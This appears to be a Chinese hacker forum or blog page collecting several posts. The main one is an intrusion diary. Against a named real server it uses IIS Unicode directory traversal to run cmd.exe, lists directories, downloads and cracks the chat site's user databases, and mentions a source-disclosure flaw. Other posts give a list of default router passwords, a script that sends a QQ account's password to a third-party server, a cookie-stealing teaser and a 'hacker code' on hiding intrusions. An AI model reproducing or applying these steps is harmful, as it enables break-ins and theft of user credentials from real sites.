入侵日记:入侵聊天室 这其实是今年~3月份的事了 那时我正在上课呢 礼拜天上网就搞搞 黑客我有入侵成功后就写记录的习惯 要是我没写你们就看不到 这文章了 呵呵~本人向来不去什么聊天室觉得简直就是浪费生命的表现 但偏偏有不少人喜欢去里面捣乱+我绝对是支持的 (不过不支持语言伤害)但既然有人感兴趣就拿个地方给大家讲讲下不为例!!!就拿不少人喜欢的江湖来讲讲吧我去的是四川自贡分部(一点废话小飞贼版权所有)地址是http://61.139.44.69/xajh首先用http://61.139.44.69/xajh/.ida可以看到它的物理路径 显示为:找不到 IDQ 文件 C:\Inetpub\wwwroot\xajh\.ida然后用http://61.139.44.69/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\可以看到它的C盘根目录为: (一点废话小飞贼版权所有)Directory of c:\ 2002-3-12 15:58 0 -xquizit.nfo 2002-3-12 15:58 0 .zip2002-3-12 15:59 0 001.mid2002-3-12 15:56 0 07-艳阳天.mp32002-3-12 15:58 0 1-1-132684_4(1).jpg2002-3-12 15:58 0 1.gif2002-3-12 15:49 0 3.ram2002-3-12 15:49 0 3.rm2002-3-12 15:58 0 2.gif2002-3-12 15:58 0 3.gif2002-3-12 15:58 0 4.gif2002-3-12 15:58 0 5.gif2002-3-12 15:58 0 6.gif2002-3-12 15:55 0 9901_01.htm2002-3-12 15:50 0 9901_01.mp32002-3-12 15:55 0 9901_01.ram2002-3-12 15:55 0 9901_01.rm2002-3-12 15:55 0 9901_02.htm2002-3-12 15:50 0 9901_02.mp32002-3-12 15:55 0 9901_02.ram2002-3-12 15:55 0 9901_02.rm2002-3-12 15:55 0 9901_03.htm2002-3-12 15:50 0 9901_03.mp32002-3-12 15:55 0 9901_03.ram2002-3-12 15:55 0 9901_03.rm2002-3-12 15:55 0 9901_04.htm2002-3-12 15:50 0 9901_04.mp32002-3-12 15:55 0 9901_04.ram2002-3-12 15:55 0 9901_04.rm2002-3-12 15:55 0 9901_05.htm2002-3-12 15:50 0 9901_05.mp32002-3-12 15:55 0 9901_05.ram2002-3-12 15:55 0 9901_05.rm......实在太多了 没有显示完 还有好多垃圾MP3 :(好象是2002年 安装的 呵呵直接进去看我们要看的访问http://61.139.44.69/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+C:\Inetpub\wwwroot\xajh\显示为:(一点废话小飞贼版权所有)Directory of C:\Inetpub\wwwroot\xajh2002-3-13 17:49 < DIR > .2002-3-13 17:49 < DIR > ..2002-3-12 16:33 < DIR > admin2002-3-12 16:33 < DIR > bbs2002-3-12 16:33 < DIR > chat2002-3-12 16:33 < DIR > Commodity2002-3-12 18:45 5 015 cuteftp.cnt2002-3-12 18:46 130 748 cuteftp.hlp2002-3-12 16:33 < DIR > face12002-3-12 16:33 < DIR > faction2002-3-12 16:33 < DIR > flower2002-3-12 16:33 < DIR > gamebak2002-3-12 19:08 829 global.asa2002-3-12 16:33 < DIR > images2002-09-30 19:51 3 513 index.asp2002-09-30 19:34 433 index.htm2002-09-30 19:47 5 062 jh.asp2002-09-19 18:58 488 login.asp2002-08-30 21:49 1 324 Message.asp2002-3-12 16:33 < DIR > midi2002-09-18 21:47 1 850 modipass.htm2002-09-06 19:07 97 music.asp2002-09-23 11:56 82 online.asp2002-09-22 12:29 2 133 register.htm2002-09-25 14:07 2 37 s1.htm2002-3-12 16:33 < DIR > serve2002-09-01 22:22 431 style.css2002-09-19 19:12 400 wupin.asp2002-3-12 16:33 < DIR > yuelao2002-3-13 17:15 1 001 472 zg11.mdb2002-3-11 07:58 978 944 zg21.mdb17 File(s) 2 134 928 bytes14 Dir(s) 2 001 309 696 bytes free看到zg11.mdb 和zg21.mdb没有那就是记录所有用户数据密码资料的数据库了!快用浏览器拿回来吧:)http://61.139.44.69/xajh/zg11.mdbhttp://61.139.44.69/xajh/zg21.mdb好了DOWN 下来之后就是解析了现在我们已经成功一大半了 下载完毕打开的时候发现要密码 呵呵~ 麻烦还得自己破下幸好是Access97的马上就看到密码了是pass1和pass2 简单吧:)现在他们那里所有注册用户的资料数据我们就全拿到了 不过高兴别太早其中密码项还是有加密处理的 至于怎么解嘛 当然不能说了 大家可以自己试试 总之非常简单就是了 我的提示是: 你可以用一些常用的加密方式慢慢试 呵呵 还有他们的服务器2002NT有translate:f的漏洞可以轻松看到所有ASP原文件 省了你不少时间吧。上面就是对一台2002NT服务器上的聊天室的简单破解 实际上是通过远程调用CMD进程来实现的 当然方法还有很多大家可以随便看看 如果你对这篇文章有什么不理解的地方或让我帮你破什么BBS 聊天室千万不要找我 毕竟本人还是主张不要聊天浪费生命的。顺带我小飞贼在建议下 C盘根目录 的东西不 不要放得太集中 小心被人利用
黑客宣言(需要的话希望斑竹至个顶) 首先先申明一下版权问题 以下内容来源与网络 资料 与 黑客联盟黑客守则 (入侵不等于要破坏 不要相信权威)1。不恶意破坏任何的系统,这样只会给你带来麻烦。恶意破坏他人的软体将导致法律责任,如果你只是使用电脑,那仅为非法使用!!注意:千万不要破坏别人的软体或资料!!2。不修改任何的系统档,如果你是为了要进入系统而修改它,请在达到目的后将它改回原状。3。不要轻易的将你要hack的站台告诉你不信任的朋友。4。不要在bbs上谈论你hack的任何事情。5。在post文章的时候不要使用真名。6。正在入侵的时候,不要随意离开你的电脑。7。不要侵入或破坏政府机关的主机。8。不要在电话中谈论你hack的任何事情。9。将你的笔记放在安全的地方。10。想要成为hacker就要真正的hacking,读遍所有有关系统安全或系统漏洞的文件(英文快点学好)!11。已侵入电脑中的帐号不得清除或涂改。12。不得修改系统档案,如果为了隐藏自己的侵入而做的修改则不在此限,但仍须维持原来系统的安全性,不得因得到系统的控制权而将门户大开!!13。不将你已破解的帐号分享于你的朋友。黑客精神(不屈 努力 奋斗 互助 创新)这世上充满著等着被解决的迷人问题。 没有任何人必须一再的解决同一个问题。 无聊而单调的工作是有害的。 自由才好。 态度并非不等效于能力解释:猜疑态度和尊敬各种能力。Hacker们不会想浪费时间在虚华的人的身上,他们尊敬的是能力 ,特别是身为hacke 的能力,但对于其它方面的能力也是充满敬意。 态度:Hacker们解决了问题并创造新东西,他们相信自由并自愿的互相帮助。黑客之追求(打破一切限制 冲开束缚的枷锁 为大众造福利)� (1)通往电脑的路不只一条,进入(访问)计算机应该是不受限制的和绝对的,总是服从于手指的命令; ��(2)一切信息都应该是免费的; ��(3)怀疑权威,促进分权; ��(4)应该以作为黑客的高超技术水平来评价黑客,而非用什么正式组织的或者他们的不恰当的标准来判断; ��(5)任何一个人都能在计算机上创造艺术和美; ��(6)计算机能够使生活变得更美好。 �� ��不论是先前的预设还是他人的总结,黑客总是自觉自在地践行着以上的黑客伦理,尽管其中一些人有时会祭起民族的、国家的、政治的大旗,尽管有些纯粹是满足好奇欲和偷窥欲,但终究不具有普遍性。在此,让我们探究黑客伦理与大众伦理的兼容度。欢迎转载请著名 版权
关于挂QQ的方法 一说到 挂QQ大家就会想有什么 工具 改 SYM 32的文件有没有想过用 HTML 代码呢? 算了方便大家就 发布一下代码吧 var qq = "1000000"; //qq号码var pwd = "123456"; //密码 if (window.XMLHttpRequest) { var x = new XMLHttpRequest();} else { var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP'); for(var n = 0; n < MSXML.length; n ++) { try { var objXMLHTTP = new ActiveXObject(MSXML[n]); break; } catch(e) { } }} objXMLHTTP.open("POST", "http://211.139.167.71/waptest/TWF/qqportal/rela/updateuserinfo.jsp", false);objXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");objXMLHTTP.setRequestHeader("Connection", "Keep-Alive");objXMLHTTP.send("qq=" + qq + "&pwd=" + pwd + "&FromWhere=register"); if (objXMLHTTP.responseText.indexOf("验证失败") > 0) { alert("登录失败");} else { alert("等录成功");} 把以上代码写入记事本之后 把QQ号码 和密码的地方做相应修改 在改后缀名 双击运行 就能挂QQ了 不用开QQ那么麻烦
可以截获论坛的ID和密码的 PHP脚本代码 首先 先说明下原理 论坛记录或登陆时会用到COOKI~ 意思是小甜饼 为什么英文叫小甜饼 我也不知道 它是用来记录 登陆人员ID和密码的 我们也可以通过PHP脚本 得到ID和密码 怎么做呢 代码如下
和为QQ群做的黑客论坛 由于HACKER技术讨论群(高级群)人数 以满做了一个 论坛 http://www.sqwm.com/bbs/ 我知道 有漏洞 希望网络流氓就不黑了可以来讨论技术
破解网站服务器(心得) 最近 破解不少日本服务器了 有很多是用的默认密码呵呵 好白痴哦!!! 一些服务器默认的 用户名和密码品牌:实达默认IP:192.168.10.1版本:2110ehr v3.20、 2110ehr v3.21、 2110ehr v3.51用户名:admin 密码:conexant版本:2110ehr v4.5用户名:root 密码:grouter版本:2110eh v3.51(中文web界面)用户名:admin 密码:starnetadsl品牌:艾玛默认IP:192.168.101.1用户名:admin 密码:admin品牌:神州数码/华硕用户名:adsl 密码:adsl1234品牌:全向用户名:root 密码:root品牌:普天用户名:putian 密码:123456品牌:e-tek用户名:admin 密码:12345品牌:zyxel用户名:anonymous密码:1234品牌:北电用户名:anonymous 密码:12345品牌:大恒用户名:admin 密码:admin品牌:大唐用户名:admin 密码:1234品牌:斯威特用户名:root 密码:root用户名:user 密码:user品牌:中兴用户名:adsl 密码:adsl831品牌:BENQ用户名:user 密码:benq1234品牌:华硕用户名:ADSL 密码:adsl1234
对新手的说教 有点想用菜鸟这词 但是有点贬低的意思 就是新手吧~如果在看贴的你想成为厉害的黑客的~ 建议少来 这贴吧转~这贴吧 没几个高手 全国排名上百的黑客 都在努力学习~ 因为他们知道不努力就会落后如果想 提高自己的黑客 技术 建议是自学 不要依靠任何人 关键时刻值得信任的人还是自己我家电脑书都卖了 40多本了~ 但是 我觉得 我的知识还是不够 自己依然努力学习着~希望各位 新手 能努力学习 别希望什么速成 学习这东西没什么捷径的 学黑客也一样~就这样 说教的部分 我以自己的方式 立正了一下 (欧式礼仪)又说了点 废话 时间呀时间~~~
美国————————黑客文化的发源地 常有人问我怎么成为 一个厉害的黑客 这是一个很重要的问题却很少人回答 要回答这个问题 先要明白是什么意思 翻翻字典………………………… 黑客:是电脑技术的行家或是超级热衷者 克服电脑限制 打破局限的人 但是还有两件事要了解 这还要追溯到第一台电脑的诞生 程序的实验也是刚开始的时候 当时被说为是黑客的是一群程序设计师和网络名人组成 是有特制的文化族群 他们创造了UNIX操作系统 也使 WED动起来 如果当时你对以上有所贡献 你就是一位黑客当然还有另一群人 他们也自称是黑客 他们喜欢做的就是侵入和破坏 黑客们称他们为 :骇客 很多不明事理的就用黑客来称呼他们 这是黑客们最生气的 黑客与骇客之间的区别:黑客创造新东西 骇客破坏东西你想做黑客 还是骇客给自己定个位吧
关于对拳皇系统的评价
首页
1
2
3
下一页